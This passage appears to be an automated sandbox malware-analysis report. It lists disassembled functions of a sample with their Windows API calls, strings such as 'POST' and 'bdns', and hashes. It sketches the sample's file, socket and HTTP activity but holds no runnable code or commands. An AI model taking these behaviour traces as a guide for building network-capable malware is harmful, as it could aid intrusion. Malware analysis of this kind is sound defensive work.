                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$FileRead$MultipleObjectsOverlappedResultWait
                                                                  • String ID:
                                                                  • API String ID: 146293752-0
                                                                  • Opcode ID: 3d72f10a36dbe2ffc3c1dc1083d318be9273227a9902be53aef54ddb9e19d9e0
                                                                  • Instruction ID: 90382d5a3acc7a767e680776586add6836456af10f9c3875855f56faded9b1a1
                                                                  • Opcode Fuzzy Hash: 3d72f10a36dbe2ffc3c1dc1083d318be9273227a9902be53aef54ddb9e19d9e0
                                                                  • Instruction Fuzzy Hash: 2041A3B5604219AFD722DF68DCC4FAA77A8FF49304F408658E549CB389C731E951CBA1
                                                                  Function 00403DB6 Relevance: 12.1, APIs: 8, Instructions: 107fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ReadFile.KERNEL32(?,-00417960,00000800,00000000), ref: 00403DFF
                                                                  • GetOverlappedResult.KERNEL32(?,?,?,00000000,?,?,?,00000000,000000FF,?,?,00000000,000000FF,?,?), ref: 00403E3E
                                                                  • ReadFile.KERNEL32(?,00417960,00000800,00000000,?), ref: 00403ED7
                                                                  • GetLastError.KERNEL32(?,?,00000000,000000FF,?,?), ref: 00403EE3
                                                                  • GetLastError.KERNEL32(?,?,00000000,000000FF,?,?), ref: 00403EEA
                                                                  • GetLastError.KERNEL32(?,?,?,00000000,000000FF,?,?,00000000,000000FF,?,?), ref: 00403EF3
                                                                  • WaitForMultipleObjects.KERNEL32 ref: 00403F0D
                                                                  • GetLastError.KERNEL32(?,?,00000000,000000FF,?,?), ref: 00403F1D
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$FileRead$MultipleObjectsOverlappedResultWait
                                                                  • String ID:
                                                                  • API String ID: 146293752-0
                                                                  • Opcode ID: a3c2b8a4d836f326ba00dd01a2af7da35a594ae8b6e1fa1924fa689e7bbf5e23
                                                                  • Instruction ID: 28271791b9155c45bfcfa5e5e937157ac637d84904cf2cf721747741308823d4
                                                                  • Opcode Fuzzy Hash: a3c2b8a4d836f326ba00dd01a2af7da35a594ae8b6e1fa1924fa689e7bbf5e23
                                                                  • Instruction Fuzzy Hash: 0341B2B4600219AFE710CF68DCC4FAA7B68FF49304F408669E64597391C735EA51CBA9
                                                                  Function 00363DB6 Relevance: 12.1, APIs: 8, Instructions: 107fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ReadFile.KERNEL32(?,-00377960,00000800,00000000), ref: 00363DFF
                                                                  • GetOverlappedResult.KERNEL32(?,?,?,00000000,?,?,?,00000000,000000FF,?,?,00000000,000000FF,?,?), ref: 00363E3E
                                                                  • ReadFile.KERNEL32(?,00377960,00000800,00000000,?), ref: 00363ED7
                                                                  • GetLastError.KERNEL32(?,?,00000000,000000FF,?,?), ref: 00363EE3
                                                                  • GetLastError.KERNEL32(?,?,00000000,000000FF,?,?), ref: 00363EEA
                                                                  • GetLastError.KERNEL32(?,?,?,00000000,000000FF,?,?,00000000,000000FF,?,?), ref: 00363EF3
                                                                  • WaitForMultipleObjects.KERNEL32 ref: 00363F0D
                                                                  • GetLastError.KERNEL32(?,?,00000000,000000FF,?,?), ref: 00363F1D
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$FileRead$MultipleObjectsOverlappedResultWait
                                                                  • String ID:
                                                                  • API String ID: 146293752-0
                                                                  • Opcode ID: 3771f26f6f28754f1388daabc80882db2cfc7086968c2b9b0c2728384dcb30d9
                                                                  • Instruction ID: 772b9185d2f65f8558853ca7f5a35d56840028fbe5ddb06671b38c61b651c115
                                                                  • Opcode Fuzzy Hash: 3771f26f6f28754f1388daabc80882db2cfc7086968c2b9b0c2728384dcb30d9
                                                                  • Instruction Fuzzy Hash: DD4191B5604219AFD722DF68DCC4FAA77A8FF49304F408658E546CB289C731EA41CBA1
                                                                  Function 00407500 Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 99stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$_snprintf_vsnprintflstrcmp
                                                                  • String ID: %s_$bdns
                                                                  • API String ID: 3897371274-741241040
                                                                  • Opcode ID: 124a044a6255b2877a249701a6b566efcd5087fe13bd7a91ca914f4277930df7
                                                                  • Instruction ID: 4041c77a8ee822b0534c788c84e6158342a9e1cd2e52badc2954bd78d4f0e51c
                                                                  • Opcode Fuzzy Hash: 124a044a6255b2877a249701a6b566efcd5087fe13bd7a91ca914f4277930df7
                                                                  • Instruction Fuzzy Hash: 5421E672A00219BBDB209F69AC85FEB775CEB44714F04457ABE09E3681E638DD0086E5
                                                                  Function 00367500 Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 99stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$_snprintf_vsnprintflstrcmp
                                                                  • String ID: %s_$bdns
                                                                  • API String ID: 3897371274-741241040
                                                                  • Opcode ID: 35e38350e6a3f6d72092d7ccb9d39cefc08ae8d5b92f243fbe546bc5b85e36f3
                                                                  • Instruction ID: e20870fcc4bd81c7dd183361c6b36ba1d5abaaa7e4e7011f6c6d078fd9127a02
                                                                  • Opcode Fuzzy Hash: 35e38350e6a3f6d72092d7ccb9d39cefc08ae8d5b92f243fbe546bc5b85e36f3
                                                                  • Instruction Fuzzy Hash: F3215A73600215ABEB319E68AC84FEB775CEB45714F4481A5FE0DD7105E674CD0087E0
                                                                  Function 00408670 Relevance: 12.1, APIs: 8, Instructions: 70networkmemorythreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LocalAlloc.KERNEL32(00000040,0000103C), ref: 00408688
                                                                  • htons.WS2_32(?), ref: 004086AE
                                                                  • inet_ntoa.WS2_32(?), ref: 004086F7
                                                                  • htons.WS2_32(?), ref: 00408704
                                                                  • GetTickCount.KERNEL32 ref: 00408713
                                                                  • CreateThread.KERNEL32(00000000,00000000,00408640,00000000,00000000,00000000), ref: 00408734
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040873B
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: htons$AllocCloseCountCreateHandleLocalThreadTickinet_ntoa
                                                                  • String ID:
                                                                  • API String ID: 30336511-0
                                                                  • Opcode ID: ece531b689def736ad1a046acb75a9b161b153146826fb4c6ab30ca57e0e27f5
                                                                  • Instruction ID: 9e76b70b9e18d90a2322bacb59208b5161888f5b1f8e4907ee1d559a765b4a15
                                                                  • Opcode Fuzzy Hash: ece531b689def736ad1a046acb75a9b161b153146826fb4c6ab30ca57e0e27f5
                                                                  • Instruction Fuzzy Hash: F221087894071096D3205B71ED097D77AA4AF08304F10493EF6ED972D0DBF895808B5D
                                                                  Function 00368670 Relevance: 12.1, APIs: 8, Instructions: 70networkmemorythreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LocalAlloc.KERNEL32(00000040,0000103C), ref: 00368688
                                                                  • htons.WS2_32(?), ref: 003686AE
                                                                  • inet_ntoa.WS2_32(?), ref: 003686F7
                                                                  • htons.WS2_32(?), ref: 00368704
                                                                  • GetTickCount.KERNEL32 ref: 00368713
                                                                  • CreateThread.KERNEL32(00000000,00000000,00368640,00000000,00000000,00000000), ref: 00368734
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0036873B
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: htons$AllocCloseCountCreateHandleLocalThreadTickinet_ntoa
                                                                  • String ID:
                                                                  • API String ID: 30336511-0
                                                                  • Opcode ID: 1ede74fcd523cbfddc0c0320d50d2a17b330f3dead80590ee1645117eb4340c1
                                                                  • Instruction ID: e0bddbe697a7389a2343103d5f15ce7380794a0e257442921ac703f3976f24cd
                                                                  • Opcode Fuzzy Hash: 1ede74fcd523cbfddc0c0320d50d2a17b330f3dead80590ee1645117eb4340c1
                                                                  • Instruction Fuzzy Hash: 7621E7B6640B009BD3235FB4DD0ABDA77ECAF08740F148A19F69D8B2D4DBB49580CB65
                                                                  Function 00407790 Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 69stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlenmemset$_snprintflstrcpy
                                                                  • String ID: off$state_%s
                                                                  • API String ID: 1009457118-628336787
                                                                  • Opcode ID: 70f7641bb32e469b1083378ef79434b0921ef5b18bc2d0549987eaa8ea56221d
                                                                  • Instruction ID: 92198304c3aebce230d4dd1ef02d57304f56152abc6317e3f91bbe1a6584e8e5
                                                                  • Opcode Fuzzy Hash: 70f7641bb32e469b1083378ef79434b0921ef5b18bc2d0549987eaa8ea56221d
                                                                  • Instruction Fuzzy Hash: 5711E1B598131877D720E755CD46FEA736C9F88704F0041EAF748661C2E6F86BC48AA9
                                                                  Function 00367790 Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 69stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlenmemset$_snprintflstrcpy
                                                                  • String ID: off$state_%s
                                                                  • API String ID: 1009457118-628336787
                                                                  • Opcode ID: 9f23c6bf3cbcc9c4216563c022a6c37466f42bca7d7603f0ded00397dc7a4815
                                                                  • Instruction ID: cc24b581526041f9aeab4a7c98934aa246ed02fcf4e8b704b42be48c6ab50663
                                                                  • Opcode Fuzzy Hash: 9f23c6bf3cbcc9c4216563c022a6c37466f42bca7d7603f0ded00397dc7a4815
                                                                  • Instruction Fuzzy Hash: 1011D6B694121877D732E654CD46FEB736C9B54700F4081D4FB4C6A182E6F45B848BA1
                                                                  Function 00402A30 Relevance: 10.6, APIs: 7, Instructions: 131networksleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • htons.WS2_32(?), ref: 00402A44
                                                                    • Part of subcall function 00402460: GetProcessHeap.KERNEL32(?,004020DE,?), ref: 0040246C
                                                                    • Part of subcall function 00402460: HeapAlloc.KERNEL32(?,00000008,004020DE,?,004020DE,?), ref: 0040247E
                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 00402A8A
                                                                  • WSAGetLastError.WS2_32(00000002,00000001,00000006), ref: 00402A96
                                                                  • GetLastError.KERNEL32(00000002,00000001,00000006), ref: 00402A9B
                                                                    • Part of subcall function 004024A0: GetProcessHeap.KERNEL32(00000000,?,00402131,00000000), ref: 004024B4
                                                                    • Part of subcall function 004024A0: HeapFree.KERNEL32(?,00000000,1!@), ref: 004024C3
                                                                  • inet_ntoa.WS2_32(00000002), ref: 00402AEE
                                                                  • connect.WS2_32(00000000,?,00000010), ref: 00402AFC
                                                                  • Sleep.KERNEL32(000005DC,00000000,?,00000010,00000001,00000006), ref: 00402B0B
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$ErrorLastProcess$AllocFreeSleepconnecthtonsinet_ntoasocket
                                                                  • String ID:
                                                                  • API String ID: 268164981-0
                                                                  • Opcode ID: 44dedb86cd978a286b815524257946b4e4894fd2ee4a2f55442f8e7975e1c89b
                                                                  • Instruction ID: ce191278c195bcc5fe46e87e2f95668e3f48f171ff9216de77ec0a31515bc727
                                                                  • Opcode Fuzzy Hash: 44dedb86cd978a286b815524257946b4e4894fd2ee4a2f55442f8e7975e1c89b
                                                                  • Instruction Fuzzy Hash: F4411C71E00204ABCB10EFA9D985AAFB3B5EF44324F10457BE519EB3C0D6B9A941CB85
                                                                  Function 00407F90 Relevance: 10.6, APIs: 7, Instructions: 131networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • select.WS2_32(00000000,00000000,?,00000000,?), ref: 00407FD4
                                                                  • send.WS2_32(?,?,?,00000000), ref: 00407FFB
                                                                  • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,00000000,?), ref: 00408004
                                                                  • select.WS2_32(00000000,00000000,00000000,00000001,?), ref: 0040803D
                                                                  • select.WS2_32(00000000,?,00000000,00000000,?), ref: 00408081
                                                                  • recv.WS2_32(?,?,00001000,00000000), ref: 0040809A
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: select$FreeLocalrecvsend
                                                                  • String ID:
                                                                  • API String ID: 1822081929-0
                                                                  • Opcode ID: 0871b2e34e756f4d0f63523cb201b98f0c40d0ec107a21b26a04a251aac6ff47
                                                                  • Instruction ID: 909fc2e90b0f87b3fef5befaca8da21e2df52dd308851a13e64ceea63d8b760f
                                                                  • Opcode Fuzzy Hash: 0871b2e34e756f4d0f63523cb201b98f0c40d0ec107a21b26a04a251aac6ff47
                                                                  • Instruction Fuzzy Hash: 4A41AC712003049BD730DB69D881BE7B3F8EB88710F004A9FF5899B681E6F5A9C48B94
                                                                  Function 00362A30 Relevance: 10.6, APIs: 7, Instructions: 131networksleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • htons.WS2_32(?), ref: 00362A44
                                                                    • Part of subcall function 00362460: GetProcessHeap.KERNEL32(?,003620DE,?), ref: 0036246C
                                                                    • Part of subcall function 00362460: HeapAlloc.KERNEL32(?,00000008,003620DE,?,003620DE,?), ref: 0036247E
                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 00362A8A
                                                                  • WSAGetLastError.WS2_32(00000002,00000001,00000006), ref: 00362A96
                                                                  • GetLastError.KERNEL32(00000002,00000001,00000006), ref: 00362A9B
                                                                    • Part of subcall function 003624A0: GetProcessHeap.KERNEL32(00000000,?,00362131,00000000), ref: 003624B4
                                                                    • Part of subcall function 003624A0: HeapFree.KERNEL32(?,00000000,1!6), ref: 003624C3
                                                                  • inet_ntoa.WS2_32(00000002), ref: 00362AEE
                                                                  • connect.WS2_32(00000000,?,00000010), ref: 00362AFC
                                                                  • Sleep.KERNEL32(000005DC,00000000,?,00000010,00000001,00000006), ref: 00362B0B
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$ErrorLastProcess$AllocFreeSleepconnecthtonsinet_ntoasocket
                                                                  • String ID:
                                                                  • API String ID: 268164981-0
                                                                  • Opcode ID: bfcadc20b8bb598b7875635dc466f004f7a700535ae043ce950b3ae09be9d551
                                                                  • Instruction ID: bf5937e66d65044f7ff70193dd473e818395472c05b458c832c9ac140d7f1877
                                                                  • Opcode Fuzzy Hash: bfcadc20b8bb598b7875635dc466f004f7a700535ae043ce950b3ae09be9d551
                                                                  • Instruction Fuzzy Hash: F141F371E00A049BCB22EFA8D881AAFB3B9EF44320F12C569F559EF344D6719941CBD1
                                                                  Function 00367F90 Relevance: 10.6, APIs: 7, Instructions: 131networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • select.WS2_32(00000000,00000000,?,00000000,?), ref: 00367FD4
                                                                  • send.WS2_32(?,?,?,00000000), ref: 00367FFB
                                                                  • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,00000000,?), ref: 00368004
                                                                  • select.WS2_32(00000000,00000000,00000000,00000001,?), ref: 0036803D
                                                                  • select.WS2_32(00000000,?,00000000,00000000,?), ref: 00368081
                                                                  • recv.WS2_32(?,?,00001000,00000000), ref: 0036809A
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: select$FreeLocalrecvsend
                                                                  • String ID:
                                                                  • API String ID: 1822081929-0
                                                                  • Opcode ID: 9b26299577c8201637e5e906a5b2313375ded33ff1ccd64c5d7e86a4724e60e5
                                                                  • Instruction ID: 708097e4dbf1726e06b8bfb7b2901984775fe1b11cf976bc956b4b9ceb4a0709
                                                                  • Opcode Fuzzy Hash: 9b26299577c8201637e5e906a5b2313375ded33ff1ccd64c5d7e86a4724e60e5
                                                                  • Instruction Fuzzy Hash: 3D418271500704ABD730DF69DC81BE6B3F8EB98710F008A8EF58D9B681D7F5A9858B90
                                                                  Function 00406E20 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 126memorystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00402460: GetProcessHeap.KERNEL32(?,004020DE,?), ref: 0040246C
                                                                    • Part of subcall function 00402460: HeapAlloc.KERNEL32(?,00000008,004020DE,?,004020DE,?), ref: 0040247E
                                                                    • Part of subcall function 0040AFA0: lstrlenA.KERNEL32(?,?,00000000,00000000), ref: 0040AFBD
                                                                    • Part of subcall function 0040AFA0: HeapAlloc.KERNEL32(?,00000008,-00000002), ref: 0040AFCB
                                                                    • Part of subcall function 0040AFA0: memset.MSVCRT ref: 0040AFE8
                                                                    • Part of subcall function 0040AFA0: memset.MSVCRT ref: 0040B002
                                                                    • Part of subcall function 0040AFA0: lstrlenA.KERNEL32(?), ref: 0040B013
                                                                    • Part of subcall function 0040AFA0: sscanf.MSVCRT ref: 0040B02A
                                                                    • Part of subcall function 0040AFA0: strtok.MSVCRT ref: 0040B041
                                                                    • Part of subcall function 0040AFA0: _memicmp.MSVCRT ref: 0040B05B
                                                                    • Part of subcall function 0040AFA0: strtok.MSVCRT ref: 0040B06E
                                                                    • Part of subcall function 0040AFA0: lstrlenA.KERNEL32(00000000), ref: 0040B09B
                                                                    • Part of subcall function 0040AFA0: lstrlenA.KERNEL32(00000000), ref: 0040B0AD
                                                                    • Part of subcall function 0040AFA0: lstrlenA.KERNEL32(00000000), ref: 0040B0BB
                                                                    • Part of subcall function 0040AFA0: lstrlenA.KERNEL32(00000000), ref: 0040B0C6
                                                                    • Part of subcall function 0040AFA0: HeapAlloc.KERNEL32(?,00000000,?), ref: 0040B0D5
                                                                    • Part of subcall function 0040AFA0: _memicmp.MSVCRT ref: 0040B0EB
                                                                  • strstr.MSVCRT ref: 00406EBC
                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?), ref: 00406EC9
                                                                  • lstrlenA.KERNEL32(?,?,?,?,?), ref: 00406EE7
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 00406F1A
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 00406F2C
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 00406F3C
                                                                    • Part of subcall function 0040B160: lstrlenA.KERNEL32(00406E9C,00000000,00000000,00000000,?,?,00406E9C), ref: 0040B178
                                                                    • Part of subcall function 0040B160: HeapAlloc.KERNEL32(?,00000008,-00000002,?,?,00406E9C), ref: 0040B186
                                                                    • Part of subcall function 0040B160: lstrlenA.KERNEL32(00406E9C,?,?,00406E9C), ref: 0040B18F
                                                                    • Part of subcall function 0040B160: strstr.MSVCRT ref: 0040B19F
                                                                    • Part of subcall function 0040B160: strstr.MSVCRT ref: 0040B1B6
                                                                    • Part of subcall function 0040B160: lstrlenA.KERNEL32(-00000004,?,?,?,?,?,00406E9C), ref: 0040B1C3
                                                                    • Part of subcall function 0040B160: HeapAlloc.KERNEL32(?,00000008,-00000002,?,?,?,?,?,00406E9C), ref: 0040B1D2
                                                                    • Part of subcall function 0040B160: lstrlenA.KERNEL32(-00000004,?,?,?,?,?,00406E9C), ref: 0040B1DC
                                                                    • Part of subcall function 0040B160: lstrcpynA.KERNEL32(00000000,-00000004,00000001,?,?,?,?,?,00406E9C), ref: 0040B1E5
                                                                    • Part of subcall function 0040B160: HeapFree.KERNEL32(?,00000000,00000000), ref: 0040B1F8
                                                                    • Part of subcall function 004101E0: memset.MSVCRT ref: 00410202
                                                                    • Part of subcall function 004101E0: GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 00410213
                                                                    • Part of subcall function 004101E0: EnterCriticalSection.KERNEL32(0044B4E4), ref: 00410223
                                                                    • Part of subcall function 004101E0: strstr.MSVCRT ref: 00410243
                                                                    • Part of subcall function 004101E0: lstrlenA.KERNEL32(00000000), ref: 00410254
                                                                    • Part of subcall function 004101E0: HeapAlloc.KERNEL32(00000000,00000008,00000001), ref: 0041025F
                                                                    • Part of subcall function 004101E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 00410272
                                                                    • Part of subcall function 004101E0: strstr.MSVCRT ref: 00410281
                                                                    • Part of subcall function 004101E0: _snprintf.MSVCRT ref: 004102C8
                                                                    • Part of subcall function 004101E0: strstr.MSVCRT ref: 004102EF
                                                                    • Part of subcall function 004101E0: HeapFree.KERNEL32(?,00000000,00000000), ref: 004103E4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heaplstrlen$Allocstrstr$Free$memset$Process_memicmpstrtok$CriticalEnterSection_snprintflstrcpylstrcpynsscanf
                                                                  • String ID: POST
                                                                  • API String ID: 836748388-1814004025
                                                                  • Opcode ID: 562dd2a2906666e8d5d78590dbbe1f82c56a871b10fee489a4b4aa9520b9b78c
                                                                  • Instruction ID: cc10cac82836c26b039bb3b82ce5bd358b0495aa14e7187af42939d2a19edcdf
                                                                  • Opcode Fuzzy Hash: 562dd2a2906666e8d5d78590dbbe1f82c56a871b10fee489a4b4aa9520b9b78c
                                                                  • Instruction Fuzzy Hash: 6331D675900205BBCB10DFA5EC85E9B776CEB84304F15417EFA09A7380DA79ED6087AE
                                                                  Function 00366E20 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 126memorystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00362460: GetProcessHeap.KERNEL32(?,003620DE,?), ref: 0036246C
                                                                    • Part of subcall function 00362460: HeapAlloc.KERNEL32(?,00000008,003620DE,?,003620DE,?), ref: 0036247E
                                                                    • Part of subcall function 0036AFA0: lstrlenA.KERNEL32(?,?,00000000,00000000), ref: 0036AFBD
                                                                    • Part of subcall function 0036AFA0: HeapAlloc.KERNEL32(?,00000008,-00000002), ref: 0036AFCB
                                                                    • Part of subcall function 0036AFA0: memset.MSVCRT ref: 0036AFE8
                                                                    • Part of subcall function 0036AFA0: memset.MSVCRT ref: 0036B002
                                                                    • Part of subcall function 0036AFA0: lstrlenA.KERNEL32(?), ref: 0036B013
                                                                    • Part of subcall function 0036AFA0: sscanf.MSVCRT ref: 0036B02A
                                                                    • Part of subcall function 0036AFA0: strtok.MSVCRT ref: 0036B041
                                                                    • Part of subcall function 0036AFA0: _memicmp.MSVCRT ref: 0036B05B
                                                                    • Part of subcall function 0036AFA0: strtok.MSVCRT ref: 0036B06E
                                                                    • Part of subcall function 0036AFA0: lstrlenA.KERNEL32(00000000), ref: 0036B09B
                                                                    • Part of subcall function 0036AFA0: lstrlenA.KERNEL32(00000000), ref: 0036B0AD
                                                                    • Part of subcall function 0036AFA0: lstrlenA.KERNEL32(00000000), ref: 0036B0BB
                                                                    • Part of subcall function 0036AFA0: lstrlenA.KERNEL32(00000000), ref: 0036B0C6
                                                                    • Part of subcall function 0036AFA0: HeapAlloc.KERNEL32(?,00000000,?), ref: 0036B0D5
                                                                    • Part of subcall function 0036AFA0: _memicmp.MSVCRT ref: 0036B0EB
                                                                  • strstr.MSVCRT ref: 00366EBC
                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?), ref: 00366EC9
                                                                  • lstrlenA.KERNEL32(?,?,?,?,?), ref: 00366EE7
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 00366F1A
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 00366F2C
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 00366F3C
                                                                    • Part of subcall function 0036B160: lstrlenA.KERNEL32(00366E9C,00000000,00000000,00000000,?,?,00366E9C), ref: 0036B178
                                                                    • Part of subcall function 0036B160: HeapAlloc.KERNEL32(?,00000008,-00000002,?,?,00366E9C), ref: 0036B186
                                                                    • Part of subcall function 0036B160: lstrlenA.KERNEL32(00366E9C,?,?,00366E9C), ref: 0036B18F
                                                                    • Part of subcall function 0036B160: strstr.MSVCRT ref: 0036B19F
                                                                    • Part of subcall function 0036B160: strstr.MSVCRT ref: 0036B1B6
                                                                    • Part of subcall function 0036B160: lstrlenA.KERNEL32(-00000004,?,?,?,?,?,00366E9C), ref: 0036B1C3
                                                                    • Part of subcall function 0036B160: HeapAlloc.KERNEL32(?,00000008,-00000002,?,?,?,?,?,00366E9C), ref: 0036B1D2
                                                                    • Part of subcall function 0036B160: lstrlenA.KERNEL32(-00000004,?,?,?,?,?,00366E9C), ref: 0036B1DC
                                                                    • Part of subcall function 0036B160: lstrcpynA.KERNEL32(00000000,-00000004,00000001,?,?,?,?,?,00366E9C), ref: 0036B1E5
                                                                    • Part of subcall function 0036B160: HeapFree.KERNEL32(?,00000000,00000000), ref: 0036B1F8
                                                                    • Part of subcall function 003701E0: memset.MSVCRT ref: 00370202
                                                                    • Part of subcall function 003701E0: GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 00370213
                                                                    • Part of subcall function 003701E0: EnterCriticalSection.KERNEL32(003AB4E4), ref: 00370223
                                                                    • Part of subcall function 003701E0: strstr.MSVCRT ref: 00370243
                                                                    • Part of subcall function 003701E0: lstrlenA.KERNEL32(00000000), ref: 00370254
                                                                    • Part of subcall function 003701E0: HeapAlloc.KERNEL32(00000000,00000008,00000001), ref: 0037025F
                                                                    • Part of subcall function 003701E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 00370272
                                                                    • Part of subcall function 003701E0: strstr.MSVCRT ref: 00370281
                                                                    • Part of subcall function 003701E0: _snprintf.MSVCRT ref: 003702C8
                                                                    • Part of subcall function 003701E0: strstr.MSVCRT ref: 003702EF
                                                                    • Part of subcall function 003701E0: HeapFree.KERNEL32(?,00000000,00000000), ref: 003703E4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heaplstrlen$Allocstrstr$Free$memset$Process_memicmpstrtok$CriticalEnterSection_snprintflstrcpylstrcpynsscanf
                                                                  • String ID: POST
                                                                  • API String ID: 836748388-1814004025
                                                                  • Opcode ID: 93fc480bebc7651962fa53b0848c1850a07d408aae686603389932aa27244205
                                                                  • Instruction ID: 692bf602b77452e45e56455239784907bdf79fb597ec5bdc72c3686b25fffd5b
                                                                  • Opcode Fuzzy Hash: 93fc480bebc7651962fa53b0848c1850a07d408aae686603389932aa27244205
